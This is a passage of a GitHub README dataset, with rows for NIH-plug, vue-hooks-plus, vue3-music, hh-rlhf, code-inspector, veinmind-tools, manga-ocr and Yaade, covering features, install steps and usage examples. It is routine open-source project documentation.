beam.
- [**Loudness War Winner**](plugins/loudness_war_winner) does what it says on
the tin. Have you ever wanted to show off your dominance by winning the
loudness war? Neither have I. Dissatisfaction guaranteed.
- [**Puberty Simulator**](plugins/puberty_simulator) is that patent pending One
Weird Plugin that simulates the male voice change during puberty! If it was
not already obvious from that sentence, this plugin is a joke, but it might
actually be useful (or at least interesting) in some situations. This plugin
pitches the signal down an octave, but it also has the side effect of causing
things to sound like a cracking voice or to make them sound slightly out of
tune.
- [**Safety Limiter**](plugins/safety_limiter) is a simple tool to prevent ear
damage. As soon as there is a peak above 0 dBFS or the specified threshold,
the plugin will cut over to playing SOS in Morse code, gradually fading out
again when the input returns back to safe levels. Made for personal use during
plugin development and intense sound design sessions, but maybe you'll find it
useful too!
- [**Soft Vacuum**](plugins/soft_vacuum) is a straightforward port of
Airwindows' [Hard Vacuum](https://www.airwindows.com/hard-vacuum-vst/) plugin
with parameter smoothing and up to 16x linear-phase oversampling, because I
liked the distortion and just wished it had oversampling. All credit goes to
Chris from Airwindows. I just wanted to share this in case anyone else finds
it useful.
- [**Spectral Compressor**](plugins/spectral_compressor) can squash anything
into pink noise, apply simultaneous upwards and downwards compressor to
dynamically match the sidechain signal's spectrum and morph one sound into
another, and lots more. Have you ever wondered what a 16384 band OTT would
sound like? Neither have I.
## Framework
### Current features
- Supports both VST3 and [CLAP](https://github.com/free-audio/clap) by simply
adding the corresponding `nih_export_<api>!(Foo)` macro to your plugin's
library.
- Standalone binaries can be made by calling `nih_export_standalone(Foo)` from
your `main()` function. Standalones come with a CLI for configuration and full
JACK audio, MIDI, and transport support.
- Rich declarative parameter system without any boilerplate.
- Define parameters for your plugin by adding `FloatParam`, `IntParam`,
`BoolParam`, and `EnumParam<T>` fields to your parameter struct, assign
stable IDs to them with the `#[id = "foobar"]`, and a `#[derive(Params)]`
does all of the boring work for you.
- Parameters can have complex value distributions and the parameter objects
come with built-in smoothers and callbacks.
- Use simple enums deriving the `Enum` trait with the `EnumParam<T>` parameter
type for parameters that allow the user to choose between multiple discrete
options. That way you can use regular Rust pattern matching when working
with these values without having to do any conversions yourself.
- Store additional non-parameter state for your plugin by adding any field
that can be serialized with [Serde](https://serde.rs/) to your plugin's
`Params` object and annotating them with `#[persist = "key"]`.
- Optional support for state migrations, for handling breaking changes in
plugin parameters.
- Group your parameters into logical groups by nesting `Params` objects using
the `#[nested(group = "...")]` attribute.
- The `#[nested]` attribute also enables you to use multiple copies of the
same parameter, either as regular object fields or through arrays.
- When needed, you can also provide your own implementation for the `Params`
trait to enable compile time generated parameters and other bespoke
functionality.
- Stateful. Behaves mostly like JUCE, just without all of the boilerplate.
- Comes with a simple yet powerful way to asynchronously run background tasks
from a plugin that's both type-safe and realtime-safe.
- Does not make any assumptions on how you want to process audio, but does come
with utilities and adapters to help with common access patterns.
- Efficiently iterate over an audio buffer either per-sample per-channel,
per-block per-channel, or even per-block per-sample-per-channel with the
option to manually index the buffer or get access to a channel slice at any
time.
- Easily leverage per-channel SIMD using the SIMD adapters on the buffer and
block iterators.
- Comes with bring-your-own-FFT adapters for common (inverse) short-time
Fourier Transform operations. More to come.
- Optional sample accurate automation support for VST3 and CLAP that can be
enabled by setting the `Plugin::SAMPLE_ACCURATE_AUTOMATION` constant to
`true`.
- Optional support for compressing the human readable JSON state files using
[Zstandard](https://en.wikipedia.org/wiki/Zstd).
- Comes with adapters for popular Rust GUI frameworks as well as some basic
widgets for them that integrate with NIH-plug's parameter system. Currently
there's support for [egui](nih_plug_egui), [iced](nih_plug_iced) and
[VIZIA](nih_plug_vizia).
- A simple and safe API for state saving and restoring from the editor is
provided by the framework if you want to do your own internal preset
management.
- Full support for receiving and outputting both modern polyphonic note
expression events as well as MIDI CCs, channel pressure, and pitch bend for
CLAP and VST3.
- MIDI SysEx is also supported. Plugins can define their own structs or sum
types to wrap around those messages so they don't need to interact with raw
byte buffers in the process function.
- Support for flexible dynamic buffer configurations, including variable numbers
of input and output ports.
- First-class support for several more exotic CLAP features:
- Both monophonic and polyphonic parameter modulation are supported.
- Plugins can declaratively define pages of remote controls that DAWs can bind
to hardware controllers.
- A plugin bundler accessible through the
`cargo xtask bundle <package> <build_arguments>` command that automatically
detects which plugin targets your plugin exposes and creates the correct
plugin bundles for your target operating system and architecture, with
cross-compilation support. The cargo subcommand can easily be added to [your
own project](https://github.com/robbert-vdh/nih-plug/tree/master/nih_plug_xtask)
as an alias or [globally](https://github.com/robbert-vdh/nih-plug/tree/master/cargo_nih_plug)
as a regular cargo subcommand.
- Tested on Linux and Windows, with limited testing on macOS. Windows support
has mostly been tested through Wine with
[yabridge](https://github.com/robbert-vdh/yabridge).
- See the [`Plugin`](src/plugin.rs) trait's documentation for an incomplete list
of the functionality that has not yet been implemented.
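As a taste of the declarative parameter system mentioned above, here is a minimal
sketch of a `Params` struct, loosely modeled on the bundled gain example; the exact
ranges and builder calls are illustrative and may differ slightly between NIH-plug
versions:

```rust
use nih_plug::prelude::*;

/// A minimal parameter struct with a single smoothed gain parameter.
#[derive(Params)]
struct GainParams {
    /// The stable ID "gain" is what ends up in saved plugin state.
    #[id = "gain"]
    pub gain: FloatParam,
}

impl Default for GainParams {
    fn default() -> Self {
        Self {
            gain: FloatParam::new(
                "Gain",
                util::db_to_gain(0.0),
                // A skewed range so the knob feels natural when working in decibels
                FloatRange::Skewed {
                    min: util::db_to_gain(-30.0),
                    max: util::db_to_gain(30.0),
                    factor: FloatRange::gain_skew_factor(-30.0, 30.0),
                },
            )
            .with_smoother(SmoothingStyle::Logarithmic(50.0))
            .with_unit(" dB"),
        }
    }
}
```

The derive macro takes care of exposing the field to the host, while the built-in
smoother can be queried per sample or per block during processing.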
### Building
NIH-plug works with the latest stable Rust compiler.
After installing [Rust](https://rustup.rs/), you can compile any of the plugins
in the `plugins` directory in the following way, replacing `gain` with the name
of the plugin:
```shell
cargo xtask bundle gain --release
```
### Plugin formats
NIH-plug can currently export VST3 and
[CLAP](https://github.com/free-audio/clap) plugins. Exporting a specific plugin
format for a plugin is as simple as calling the `nih_export_<format>!(Foo);`
macro. The `cargo xtask bundle` command will detect which plugin formats your
plugin supports and create the appropriate bundles accordingly, even when cross
compiling.
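For example, assuming a plugin type `MyPlugin` that implements the required `Plugin`,
`ClapPlugin`, and `Vst3Plugin` traits (the name is just a placeholder), exporting both
formats is a matter of two macro invocations:

```rust
// Generates the CLAP and VST3 entry points for the hypothetical `MyPlugin` type.
nih_export_clap!(MyPlugin);
nih_export_vst3!(MyPlugin);
```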
### Example plugins
The best way to get an idea for what the API looks like is to look at the
examples.
- [**gain**](plugins/examples/gain) is a simple smoothed gain plugin that shows
off a couple other parts of the API, like support for storing arbitrary
serializable state.
- **gain-gui** is the same plugin as gain, but with a GUI to control the
parameter and a digital peak meter. Comes in three exciting flavors:
[egui](plugins/examples/gain_gui_egui),
[iced](plugins/examples/gain_gui_iced), and
[VIZIA](plugins/examples/gain_gui_vizia).
- [**midi_inverter**](plugins/examples/midi_inverter) takes note/MIDI events and
flips around the note, channel, expression, pressure, and CC values. This
example demonstrates how to receive and output those events.
- [**poly_mod_synth**](plugins/examples/poly_mod_synth) is a simple polyphonic
synthesizer with support for polyphonic modulation in supported CLAP hosts.
This demonstrates how polyphonic modulation can be used in NIH-plug.
- [**sine**](plugins/examples/sine) is a simple test tone generator plugin with
frequency smoothing that can also make use of MIDI input instead of generating
a static signal based on the plugin's parameters.
- [**stft**](plugins/examples/stft) shows off some of NIH-plug's other optional
higher level helper features, such as an adapter to process audio with a
short-term Fourier transform using the overlap-add method, all using the
compositional `Buffer` interfaces.
- [**sysex**](plugins/examples/sysex) is a simple example of how to send and
receive SysEx messages by defining custom message types.
## Licensing
The framework, its libraries, and the example plugins in `plugins/examples/` are
all licensed under the [ISC license](https://www.isc.org/licenses/). However,
the [VST3 bindings](https://github.com/RustAudio/vst3-sys) used by
`nih_export_vst3!()` are licensed under the GPLv3 license. This means that
unless you replace these bindings with your own bindings made from scratch, any
VST3 plugins built with NIH-plug need to be able to comply with the terms of the
GPLv3 license.
The other plugins in the `plugins/` directory may be licensed under the GPLv3
license. Check the plugin's `Cargo.toml` file for more information.
| Rust VST3 and CLAP plugin framework and plugins - because everything is better when you do it yourself | vst3,framework,plugin-framework,plugin,rust,clap,nih-plug | 0 | 30 | 59 | 2,206 | 34 | 2 | 6 |
InhiblabCore/vue-hooks-plus | <p align="center">
<a href="https://inhiblabcore.github.io/docs/hooks">
<img width="216" src="https://raw.githubusercontent.com/InhiblabCore/vue-hooks-plus/master/packages/hooks/docs/public/logo@2x.png">
</a>
</p>
<p align="center">
<a href="https://www.npmjs.com/package/vue-hooks-plus"><img src="https://img.shields.io/npm/v/vue-hooks-plus.svg" alt="npm package"></a>
<a href="https://github.com/InhiblabCore/vue-hooks-plus/actions/workflows/node-ci.yml"><img src="https://github.com/InhiblabCore/vue-hooks-plus/actions/workflows/ci.yml/badge.svg?branch=master" alt="build status"></a>
<a href="#badge"><img src="https://img.shields.io/github/languages/top/InhiblabCore/vue-hooks-plus" alt="language"></a>
<!-- <a href="https://img.badgesize.io/https:/unpkg.com/vue-hooks-plus/dist/js/index.es.js?label=gzip%20size&compression=gzip"><img src="https://img.badgesize.io/https:/unpkg.com/vue-hooks-plus/dist/js/index.es.js?label=gzip%20size&compression=gzip" alt="gzip"></a> -->
<a href="#badge"><img src="https://img.shields.io/librariesio/github/InhiblabCore/vue-hooks-plus" alt="librariesio"></a>
<a href="https://github.com/InhiblabCore/vue-hooks-plus/blob/master/LICENSE"><img src="https://img.shields.io/github/license/InhiblabCore/vue-hooks-plus" alt="LICENSE"></a>
</p>
<div align="center">
# VueHooks Plus
English | [简体中文](https://github.com/InhiblabCore/vue-hooks-plus/tree/master/README.zh-CN.md)
High performance & Simplicity Vue3 Hooks library
</div>
## ✨ Features
- 🏄🏼♂️ Easy to learn and use
- 🔋 Supports SSR
- 🛸 Contains a comprehensive collection of basic Hooks
- 🏟️ A wide range of application scenarios
- 🦾 First-class useRequest, a powerful request middle layer
- 🎪 Interactive demos, an immersive experience
- 🎯 Written in TypeScript with predictable static types
- 🪄 Supports on-demand loading to reduce bundle size
- 🤺 Playground, with ample room to experiment
- 🔐 Thorough test coverage, safe and reliable
## 📦 Install
```bash
npm i vue-hooks-plus
```
### CDN
```html
<script src="https://cdn.jsdelivr.net/npm/vue-hooks-plus/dist/js/index.iife.js"></script>
```
It will be exposed to global as `VueHooks_Plus`
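A minimal sketch of using the global build directly in a page; the hook destructured
here is only an illustration:

```html
<script src="https://cdn.jsdelivr.net/npm/vue-hooks-plus/dist/js/index.iife.js"></script>
<script>
  // The IIFE bundle attaches the library to window.VueHooks_Plus
  const { useRequest } = window.VueHooks_Plus
</script>
```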
## 🤹♀️ Usage
```typescript
import { useRequest } from 'vue-hooks-plus'
```
Import on demand
```typescript
import useRequest from 'vue-hooks-plus/es/useRequest'
```
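As a rough sketch of what a call looks like inside a component's setup code — the
`getUser` service below is a made-up fetcher, only the hook itself comes from the
library:

```typescript
import { useRequest } from 'vue-hooks-plus'

// Hypothetical service: any function returning a Promise can act as a request source
const getUser = (): Promise<{ name: string }> =>
  fetch('/api/user').then(res => res.json())

// data, loading and error are reactive refs managed by the hook
const { data, loading, error } = useRequest(getUser)
```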
Auto Import
<details>
<summary>Vite</summary><br>
```ts
import AutoImport from 'unplugin-auto-import/vite'
import { VueHooksPlusResolver } from '@vue-hooks-plus/resolvers'
export const AutoImportDeps = () =>
AutoImport({
imports: ['vue', 'vue-router'],
include: [/\.[tj]sx?$/, /\.vue$/, /\.vue\?vue/, /\.md$/],
dts: 'src/auto-imports.d.ts',
resolvers: [VueHooksPlusResolver()],
})
```
<br></details>
<details>
<summary>Webpack</summary><br>
```ts
const { VueHooksPlusResolver } = require('@vue-hooks-plus/resolvers')
module.exports = {
/* ... */
plugins: [
require('unplugin-auto-import/webpack')({
imports: ['vue', 'vue-router'],
include: [/\.[tj]sx?$/, /\.vue$/, /\.vue\?vue/, /\.md$/],
dts: 'src/auto-imports.d.ts',
resolvers: [VueHooksPlusResolver()],
}),
],
}
```
<br></details>
For other supported tools, please see [unplugin-auto-import](https://github.com/antfu/unplugin-auto-import)
### Documentation
- [English Documentations](https://inhiblabcore.github.io/docs/hooks/en)
- [中文文档](https://inhiblabcore.github.io/docs/hooks)
### Example
- [Vue Admin Novel](https://github.com/NelsonYong/vue-admin-novel)
- [Nuxt 3](https://github.com/InhiblabCore/vue-hooks-plus-example/tree/main/nuxt3)
- [Vite + Vue 3](https://github.com/InhiblabCore/vue-hooks-plus-example/tree/main/vite-vue3)
- [Webpack + Vue 3](https://github.com/InhiblabCore/vue-hooks-plus-example/tree/main/webpack-vue3)
## 🤩 Awesome
### Template
- [Ray Template](https://github.com/XiaoDaiGua-Ray/ray-template)
## 🪴 Project Activity
![Alt](https://repobeats.axiom.co/api/embed/35dbca2274542c0144993be92cc51762227543d9.svg 'Repobeats analytics image')
### Contributing
Welcome to join us! You can check out the [Contributing Guide](./CONTRIBUTING.md) to learn how to get started.
### Contributors
Thanks for all their contributions 🐝 !
<a href="https://github.com/InhiblabCore/vue-hooks-plus/graphs/contributors">
<img src="https://contrib.rocks/image?repo=InhiblabCore/vue-hooks-plus" />
</a>
## 🌸 Thanks
This project is heavily inspired by the following awesome projects.
- [ahooks](https://ahooks.js.org/)
- [@koale/useworker](https://github.com/alewin/useWorker)
## 📄 License
[MIT License](https://github.com/InhiblabCore/vue-hooks-plus/blob/master/LICENSE) © 2022-PRESENT [YongGit](https://github.com/NelsonYong)
| High performance & Simplicity 🧲 Vue 3 Hooks library | vue-hooks-plus,typescript,vue-hooks-library,hooks-library,vue3 | 62 | 11 | 128 | 901 | 6 | 4 | 1 |
SmallRuralDog/vue3-music |
# VUE3-MUSIC
A music player built with Vue 3 + TS, with a UI modeled after the QQ Music mac client.
Live demo: [https://smallruraldog.github.io/vue3-music](https://smallruraldog.github.io/vue3-music)
Set your browser window to 1050*670 for a better experience! The UI is responsive, implemented with [tailwindcss.com](https://www.tailwindcss.com)
Mobile is not yet adapted; a dedicated mobile client will later be built with [Flutter](https://flutter.dev), and the desktop client will be packaged with [Electron](https://www.electronjs.org) with a built-in API service
For security reasons the online demo does not provide an API service. You need to prepare your own API service URL, and it must be HTTPS; if your service has no HTTPS you can run the project locally. On first launch you will be asked to set the API URL
## Local installation
```
git clone https://github.com/SmallRuralDog/vue3-music.git
cd vue3-music
yarn
yarn run dev
```
## NetEase Cloud Music API
The API service must be running for the player to work properly
[API documentation](https://binaryify.github.io/NeteaseCloudMusicApi)
## UI
![image-20220310123410770](ui/image-20220310123410770.png)
![image-20220310123530635](ui/image-20220310123530635.png)
![image-20220310123634367](ui/image-20220310123634367.png)
![image-20220310123722684](ui/image-20220310123722684.png)
![image-20220310123456071](ui/image-20220310123456071.png)
![image-20220310123545606](ui/image-20220310123545606.png)
![image-20220310123650090](ui/image-20220310123650090.png)
![image-20220310123738142](ui/image-20220310123738142.png)
## PS
Use this open-source project to learn the power of Vue 3... keep it up!
| A music player built with Vue 3 + TS, UI modeled after the QQ Music mac client, with dark mode support | vue,music-player,vue3,typscript | 0 | 2 | 2 | 31 | 10 | 1 | 0 |
anthropics/hh-rlhf | ## Overview
This repository provides access to:
1. Human preference data about helpfulness and harmlessness from [Training a Helpful and Harmless Assistant with Reinforcement Learning from Human Feedback](https://arxiv.org/abs/2204.05862)
2. Human-generated red teaming data from [Red Teaming Language Models to Reduce Harms: Methods, Scaling Behaviors, and Lessons Learned](https://arxiv.org/abs/2209.07858).
Each of these datasets is described further below.
**Disclaimer**: The data contain content that may be offensive or upsetting. Topics include, but are not limited to, discriminatory language and discussions of abuse, violence, self-harm, exploitation, and other potentially upsetting subject matter. Please only engage with the data in accordance with your own personal risk tolerance. The data are intended for research purposes, especially research that can make models *less* harmful. The views expressed in the data do not reflect the views of Anthropic or any of its employees.
## Human preference data about helpfulness and harmlessness
The data are described in the paper: [Training a Helpful and Harmless Assistant with Reinforcement Learning from Human Feedback](https://arxiv.org/abs/2204.05862). If you find the data useful, please cite the paper. The data format is very simple -- each line of the jsonl files contains a pair of texts, one "chosen" and one "rejected".
For **helpfulness**, the data are grouped into train/test splits into three tranches: from our base models (context-distilled 52B language models), via rejection sampling (mostly with best-of-16 sampling) against an early preference model, and a dataset sampled during our iterated "online" process.
For **harmlessness**, the data are only collected for our base models, but otherwise formatted in the same way.
Details about the data collection process and crowdworker population can be found in the paper, specifically in Section 2 and Appendix D.
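As a rough sketch of how the preference pairs can be consumed (the file name below is a placeholder — point it at whichever train/test jsonl file you extracted from the dataset):

```python
import json

# Placeholder path: substitute one of the dataset's train/test jsonl files
with open("train.jsonl") as f:
    for line in f:
        example = json.loads(line)
        # Each record holds two conversation texts; a preference model is
        # typically trained to score "chosen" above "rejected".
        chosen, rejected = example["chosen"], example["rejected"]
```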
## Red teaming data
The data are described in the paper: [Red Teaming Language Models to Reduce Harms: Methods, Scaling Behaviors, and Lessons Learned](https://arxiv.org/abs/2209.07858). If you find the data useful, please cite the paper.
Details about the data and data collection procedures can be found in the Datasheet in the appendix of the paper.
Each line of the jsonl file contains a dictionary with the following fields:
- `transcript` a text transcript of a conversation between a human adversary (red team member) and an AI assistant
- `min_harmlessness_score_transcript` a real value score of the harmlessness of the AI assistant (lower is more harmful) as obtained from a preference model
- `num_params` number of parameters in the language model powering the AI assistant
- `model_type` type of model powering the AI assistant
- `rating` the red team member's rating of how successful they were at breaking the AI assistant (Likert scale, higher is more successful)
- `task_description` a short text description written by the red team member about how they tried to red team the AI assistant
- `task_description_harmlessness_score` a real value score of the harmlessness of the task description (lower is more harmful) as obtained from a preference model
- `red_team_member_id` an arbitrary identifier of the red team member. one red team member can generate multiple red team attacks
- `is_upworker` a binary indicator that is true if the red team member was from the crowd platform Upwork or false if they were from MTurk
- `tags` a list of up to 6 tags per transcript. tags are short descriptions of the red team attempts generated by crowdworkers who reviewed red team data post-hoc. tags were only provided for a random sample of 1000 red team attempts for two of four model types.
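A small sketch of filtering these records by the fields above; the file name is again a placeholder and the rating threshold is arbitrary:

```python
import json

successful_transcripts = []
with open("red_team_attempts.jsonl") as f:  # placeholder file name
    for line in f:
        record = json.loads(line)
        # Keep attacks the red team member rated as highly successful
        if record["rating"] >= 4:
            successful_transcripts.append(record["transcript"])
```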
## Contact
You can submit inquiries to: redteam@anthropic.com
| Human preference data for "Training a Helpful and Harmless Assistant with Reinforcement Learning from Human Feedback" | null | 0 | 22 | 4 | 4 | 0 | 1 | 0 |
zh-lx/code-inspector | packages/code-inspector-plugin/README.md | Click the dom on the page, it will open your IDE and position the cursor to the source code location of the dom. | vue,vscode,webpack-plugin,code,devtools,inspector,react,vite-plugin | 0 | 8 | 86 | 416 | 4 | 68 | 0 |
chaitin/veinmind-tools | <p align="center">
<img src="https://dinfinite.oss-cn-beijing.aliyuncs.com/image/20220428154824.png" width="120">
</p>
<h1 align="center"> veinmind-tools </h1>
<p align="center">
<a href="https://veinmind.chaitin.com/docs/">Documentation</a>
</p>
<p align="center">
<img src="https://img.shields.io/github/v/release/chaitin/veinmind-tools.svg" />
<img src="https://img.shields.io/github/release-date/chaitin/veinmind-tools.svg?color=blue&label=update" />
<img src="https://img.shields.io/badge/go report-A+-brightgreen.svg" />
<p align="center"> veinmind-tools is a container security toolset developed in-house by Chaitin Tech, incubated by the 牧云 team, and built on the <a href="https://github.com/chaitin/libveinmind">veinmind-sdk</a> </p>
<p align="center"> veinmind's Chinese name is <b>问脉</b> ("feeling the pulse"), meaning <b>container security reveals the veins; look, listen, ask and feel to cure the disease.</b> It aims to be a good remedy for the cloud-native field </p>
</p>
<p align="center"> Chinese | <a href="README.en.md">English</a> </p>
## 🔥 Demo
![](https://veinmind-cache.oss-cn-hangzhou.aliyuncs.com/img/scan.gif)
veinmind is now integrated with OpenAI: the scan results can be analyzed by OpenAI in a human-friendly way, giving you a clearer picture of which risks the scan found.
![](https://veinmind-cache.oss-cn-hangzhou.aliyuncs.com/img/ai.png)
## 🕹️ Quick start
### 1. Make sure Docker is correctly installed on the machine
```
docker info
```
### 2. Pull the [veinmind-runner](https://github.com/chaitin/veinmind-tools/tree/master/veinmind-runner) image
```
docker pull registry.veinmind.tech/veinmind/veinmind-runner:latest
```
### 3. Download the [veinmind-runner](https://github.com/chaitin/veinmind-tools/tree/master/veinmind-runner) parallel-container launch script
```
wget -q https://download.veinmind.tech/scripts/veinmind-runner-parallel-container-run.sh -O run.sh && chmod +x run.sh
```
### 4. Quickly scan local images/containers
```
./run.sh scan [image/container]
```
### 5. Use OpenAI for intelligent analysis
```
./run.sh scan [image/container] --enable-analyze --openai-token <your_openai_token>
```
> Note: when using OpenAI, make sure your current network can reach OpenAI
> When launching as a parallel container, the proxy must be set manually via docker run -e http_proxy=xxxx -e https_proxy=xxxx (when a global proxy is not in use)
### 6. Generate <html> <cli> <json> reports
```
./run.sh scan [image/container] --format=html,cli
```
> A `report.html` or `report.json` will be generated in the current directory
> Multiple report formats can be passed separated by `,`; for example `--format=html,cli,json` outputs three different reports.
## 🔨 Tool list
| Tool | Function |
|---------------------------------------------------------------------------|-------------------|
| [veinmind-runner](veinmind-runner/README.md) | Host runner for the scanning tools |
| [veinmind-malicious](plugins/go/veinmind-malicious) | Scan containers/images for malicious files |
| [veinmind-weakpass](plugins/go/veinmind-weakpass) | Scan containers/images for weak passwords |
| [veinmind-log4j2](plugins/go/veinmind-log4j2) | Scan containers/images for the log4j2 vulnerability |
| [veinmind-minio](plugins/go/veinmind-minio) | Scan containers/images for the minio vulnerability |
| [veinmind-sensitive](plugins/go/veinmind-sensitive) | Scan images for sensitive information |
| [veinmind-backdoor](plugins/go/veinmind-backdoor) | Scan images for backdoors |
| [veinmind-history](plugins/python/veinmind-history) | Scan images for abnormal history commands |
| [veinmind-vuln](plugins/go/veinmind-vuln) | Scan containers/images for asset information and vulnerabilities |
| [veinmind-webshell](plugins/go/veinmind-webshell) | Scan images for webshells |
| [veinmind-unsafe-mount](plugins/go/veinmind-unsafe-mount) | Scan containers for unsafe mount directories |
| [veinmind-iac](plugins/go/veinmind-iac) | Scan IaC files of images/clusters |
| [veinmind-escape](plugins/go/veinmind-escape) | Scan containers/images for escape risks |
| [veinmind-privilege-escalation](plugins/go/veinmind-privilege-escalation) | Scan containers/images for privilege-escalation risks |
| [veinmind-trace](plugins/go/veinmind-trace) | Scan containers for intrusion traces |
PS: all tools now support running as parallel containers
## 🧑💻 Writing plugins
You can quickly create a veinmind-tools plugin from the example; see [veinmind-example](example/) for details
## ☁️ Cloud-native infrastructure compatibility
| Name | Category | Compatible |
|-------------------------------------------------------------|-------|------|
| [Jenkins](https://github.com/chaitin/veinmind-jenkins) | CI/CD | ✔️ |
| [Gitlab CI](https://veinmind.chaitin.com/docs/ci/gitlab/) | CI/CD | ✔️ |
| [Github Action](https://github.com/chaitin/veinmind-action) | CI/CD | ✔️ |
| DockerHub | Image registry | ✔️ |
| Docker Registry | Image registry | ✔️ |
| Harbor | Image registry | ✔️ |
| Docker | Container runtime | ✔️ |
| Containerd | Container runtime | ✔️ |
| Kubernetes | Cluster | ✔️ |
## 🛴 How it works
![](docs/architecture.png)
## 🏘️ Contact us
1. You can report bugs and suggest features directly via GitHub Issues.
2. Scan the QR code below to add the veinmind assistant and join the veinmind user discussion group for more detailed discussion
![](docs/veinmind-group-qrcode.png)
## ✨ CTStack
<img src="https://ctstack-oss.oss-cn-beijing.aliyuncs.com/CT%20Stack-2.png" width="30%" />
veinmind-tools has joined the [CTStack](https://stack.chaitin.com/tool/detail?id=3) community
## ✨ 404 StarLink Project
<img src="https://github.com/knownsec/404StarLink-Project/raw/master/logo.png" width="30%">
veinmind-tools has joined the [404 StarLink Project](https://github.com/knownsec/404StarLink)
## ✨ Star History <a name="star-history"></a>
<a href="https://github.com/chaitin/veinmind-tools/stargazers">
<img width="500" alt="Star History Chart" src="https://api.star-history.com/svg?repos=chaitin/veinmind-tools&type=Date">
</a> | veinmind-tools is a container security toolset developed in-house by Chaitin Tech, built on veinmind-sdk | docker,security,image-security,containerd,container-security,cloud-native,cloud-security | 54 | 21 | 229 | 372 | 16 | 32 | 6 |
kha-white/manga-ocr | # Manga OCR
Optical character recognition for Japanese text, with the main focus being Japanese manga.
It uses a custom end-to-end model built with Transformers' [Vision Encoder Decoder](https://huggingface.co/docs/transformers/model_doc/vision-encoder-decoder) framework.
Manga OCR can be used as a general purpose printed Japanese OCR, but its main goal was to provide a high quality
text recognition, robust against various scenarios specific to manga:
- both vertical and horizontal text
- text with furigana
- text overlaid on images
- wide variety of fonts and font styles
- low quality images
Unlike many OCR models, Manga OCR supports recognizing multi-line text in a single forward pass,
so that text bubbles found in manga can be processed at once, without splitting them into lines.
See also:
- [Poricom](https://github.com/bluaxees/Poricom), a GUI reader, which uses manga-ocr
- [mokuro](https://github.com/kha-white/mokuro), a tool, which uses manga-ocr to generate an HTML overlay for manga
- [Xelieu's guide](https://rentry.co/lazyXel), a comprehensive guide on setting up a reading and mining workflow with manga-ocr/mokuro (and many other useful tips)
- Development code, including code for training and synthetic data generation: [link](manga_ocr_dev)
- Description of synthetic data generation pipeline + examples of generated images: [link](manga_ocr_dev/synthetic_data_generator)
# Installation
You need Python 3.6 or newer. Please note that the newest Python release might not be supported due to a PyTorch dependency, which often breaks with new Python releases and needs some time to catch up.
Refer to [PyTorch website](https://pytorch.org/get-started/locally/) for a list of supported Python versions.
Some users have reported problems with Python installed from Microsoft Store. If you see an error:
`ImportError: DLL load failed while importing fugashi: The specified module could not be found.`,
try installing Python from the [official site](https://www.python.org/downloads).
If you want to run with GPU, install PyTorch as described [here](https://pytorch.org/get-started/locally/#start-locally),
otherwise this step can be skipped.
## Troubleshooting
- `ImportError: DLL load failed while importing fugashi: The specified module could not be found.` - might be because of Python installed from Microsoft Store, try installing Python from the [official site](https://www.python.org/downloads)
- problem with installing `mecab-python3` on ARM architecture - try [this workaround](https://github.com/kha-white/manga-ocr/issues/16)
# Usage
## Python API
```python
from manga_ocr import MangaOcr
mocr = MangaOcr()
text = mocr('/path/to/img')
```
or
```python
import PIL.Image
from manga_ocr import MangaOcr
mocr = MangaOcr()
img = PIL.Image.open('/path/to/img')
text = mocr(img)
```
## Running in the background
Manga OCR can run in the background and process new images as they appear.
You might use a tool like [ShareX](https://getsharex.com/) or [Flameshot](https://flameshot.org/) to manually capture a region of the screen and let the
OCR read it either from the system clipboard, or a specified directory. By default, Manga OCR will write recognized text to clipboard,
from which it can be read by a dictionary like [Yomichan](https://github.com/FooSoft/yomichan).
Clipboard mode on Linux requires `wl-copy` for Wayland sessions or `xclip` for X11 sessions. You can find out which one your system needs by running `echo $XDG_SESSION_TYPE` in the terminal.
Your full setup for reading manga in Japanese with a dictionary might look like this:
capture region with ShareX -> write image to clipboard -> Manga OCR -> write text to clipboard -> Yomichan
https://user-images.githubusercontent.com/22717958/150238361-052b95d1-0152-485f-a441-48a957536239.mp4
- To read images from clipboard and write recognized texts to clipboard, run in command line:
```commandline
manga_ocr
```
- To read images from ShareX's screenshot folder, run in command line:
```commandline
manga_ocr "/path/to/sharex/screenshot/folder"
```
Note that when running in the clipboard scanning mode, any image that you copy to clipboard will be processed by OCR and replaced
by recognized text. If you want to be able to copy and paste images as usual, you should use the folder scanning mode instead
and define a separate task in ShareX just for OCR, which saves screenshots to some folder without copying them to clipboard.
When running for the first time, downloading the model (~400 MB) might take a few minutes.
The OCR is ready to use after `OCR ready` message appears in the logs.
- To see other options, run in command line:
```commandline
manga_ocr --help
```
If `manga_ocr` doesn't work, you might also try replacing it with `python -m manga_ocr`.
## Usage tips
- OCR supports multi-line text, but the longer the text, the more likely some errors are to occur.
If the recognition failed for some part of a longer text, you might try to run it on a smaller portion of the image.
- The model was trained specifically to handle manga well, but should do a decent job on other types of printed text,
such as novels or video games. It probably won't be able to handle handwritten text though.
- The model always attempts to recognize some text on the image, even if there is none.
Because it uses a transformer decoder (and therefore has some understanding of the Japanese language),
it might even "dream up" some realistic-looking sentences! This shouldn't be a problem for most use cases,
but it might get improved in the next version.
# Examples
Here are some cherry-picked examples showing the capability of the model.
| image | Manga OCR result |
|----------------------|------------------|
| ![](assets/examples/00.jpg) | 素直にあやまるしか |
| ![](assets/examples/01.jpg) | 立川で見た〝穴〟の下の巨大な眼は: |
| ![](assets/examples/02.jpg) | 実戦剣術も一流です |
| ![](assets/examples/03.jpg) | 第30話重苦しい闇の奥で静かに呼吸づきながら |
| ![](assets/examples/04.jpg) | よかったじゃないわよ!何逃げてるのよ!!早くあいつを退治してよ! |
| ![](assets/examples/05.jpg) | ぎゃっ |
| ![](assets/examples/06.jpg) | ピンポーーン |
| ![](assets/examples/07.jpg) | LINK!私達7人の力でガノンの塔の結界をやぶります |
| ![](assets/examples/08.jpg) | ファイアパンチ |
| ![](assets/examples/09.jpg) | 少し黙っている |
| ![](assets/examples/10.jpg) | わかるかな〜? |
| ![](assets/examples/11.jpg) | 警察にも先生にも町中の人達に!! |
# Contact
For any inquiries, please feel free to contact me at kha-white@mail.com
# Acknowledgments
This project was done with the usage of:
- [Manga109-s](http://www.manga109.org/en/download_s.html) dataset
- [CC-100](https://data.statmt.org/cc-100/) dataset
| Optical character recognition for Japanese text, with the main focus being Japanese manga | ocr,japanese,manga,transformers,computer-vision,deep-learning,comics | 2 | 7 | 14 | 51 | 20 | 1 | 3 |
EsperoTech/yaade | <p align="center">
<img style="width:128px;min-width:128px;max-width:128px;height:auto" src="assets/YaadeIcon.png" alt="yaade-icon"/>
</p>
<h1 align="center"><span style="color:#48bb78">Yaade</span> - Yet Another API Development Environment</h1>
Yaade is an open-source, self-hosted, collaborative API development environment.
<img src="assets/dark-mode.png" alt="dark-mode-screenshot"/>
## 📚 Documentation
